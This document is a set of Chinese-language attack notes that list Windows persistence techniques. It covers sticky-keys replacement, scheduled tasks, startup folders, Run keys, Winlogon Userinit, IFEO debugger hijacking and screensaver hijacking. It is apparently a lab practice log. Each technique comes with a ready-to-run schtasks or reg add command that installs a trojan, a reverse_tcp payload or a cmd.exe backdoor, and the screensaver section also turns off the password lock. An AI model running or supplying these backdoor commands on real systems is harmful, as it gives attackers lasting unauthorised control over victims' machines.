一、使用粘滞键
重命名木马文件为sethc
修改权限才能删除粘滞键
删除粘滞键,并粘贴木马文件
按五次shift,可以直接启动这个木马文件
二、计划任务
在计划任务目录中创建目录并写入apprun计划任务
shell schtasks /Create /TN Backdoor /SC minute /MO 1 /TR C:\123\111.exe /RU System /F
查看是否成启动计划任务
删除计划任务
schtasks /delete /tn "backdoor" /f
三、文件夹自启动
位于以下目录中的程序将在指定用户登陆时启动:
c:\users\[username]\appdata\roaming\microsoft\windows\start
使用win+R进入该目录并粘贴木马文件
开机自启成功
四、注册表自启动
打开注册表
命令 所有用户登录时启动
注册表键路径:所有用户登录时启动--08、12复现成功-对应用户权限
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
命令(其他的参考以下):
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v backdoor /t REG_SZ /d "C:\windows\system32\reverse_tcp.exe" /f
创建成功
重启win2008,成功执行222.exe木马
删除命令
shell reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v backdoor /f
五、winlogon helper-用户登录时启动
修改注册表执行命令userinit
shell reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "c:\windows\system32\userinit.exe,c:\123\333.exe" /f
查看注册表是否修改成功
成功
六、IFEO映像劫持
注册表添加映像劫持子键创建粘滞键后门
Debugger通过Image File Execution Options注册表添加映像劫持子键创建粘滞键后门(不需要TrustInstaller权限):
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
连续五次按键shift,可以直接打开命令行窗口
七、屏幕保护-普通用户即可
要先开启屏幕保护才可以利用
修改屏保执行程序为恶意程序:
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\Users\Marcus\reverse_tcp.scr" /f
设置不需要密码解锁:
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d "0" /f
将用户不活动时间设置为60秒:
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f